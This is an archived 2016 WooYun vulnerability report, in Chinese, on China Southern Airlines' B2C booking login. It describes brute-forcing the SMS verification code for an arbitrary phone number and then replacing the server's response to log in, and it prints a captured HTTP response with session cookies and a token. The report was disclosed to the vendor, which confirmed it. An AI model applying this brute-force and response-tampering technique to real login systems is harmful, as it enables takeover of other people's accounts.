乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-24: 细节已通知厂商并且等待厂商处理中 2016-05-25: 厂商已经确认,细节仅向厂商公开 2016-06-04: 细节向核心白帽子及相关领域专家公开 2016-06-14: 细节向普通白帽子公开 2016-06-24: 细节向实习白帽子公开 2016-07-09: 细节向公众公开
难道是捡漏?
1、登录选择手机登录
http://b2c.csair.com/B2C40/modules/bookingnew/manage/login.html
先来一张自己的手机号爆破证明
13888888888的验证码爆破证明
因为爆破完之后验证码是过期的,我们直接替换返回包就可以登录了
HTTP/1.1 200 OKDate: Tue, 24 May 2016 07:00:44 GMTServer: ApacheSet-Cookie: cs1246643sso=7d8ef733-7fa0-42c0-b509-c438b5607083; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: memberType=2; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: loginType=8; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: userId=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: userType4logCookie=NotM; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: userId4logCookie=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: useridCookie=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Set-Cookie: userCodeCookie=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/Pragma: No-cacheCache-Control: no-cacheExpires: Thu, 01 Jan 1970 00:00:00 GMTVary: Accept-EncodingContent-Length: 297Connection: closeContent-Type: application/json;charset=UTF-8{"success":true,"data":{"typeName":"NoMemberInformation","token":"7d8ef733-7fa0-42c0-b509-c438b5607083","userId":"13888888888","userName":"13888888888","userEnName":"13888888888","userType":"2","ip":"115.192.116.103","loginTime":1464073248246,"loginChannel":"B2C","loginType":"8","refresh":false}}
危害等级:中
漏洞Rank:10
确认时间:2016-05-25 08:36
感谢提醒
暂无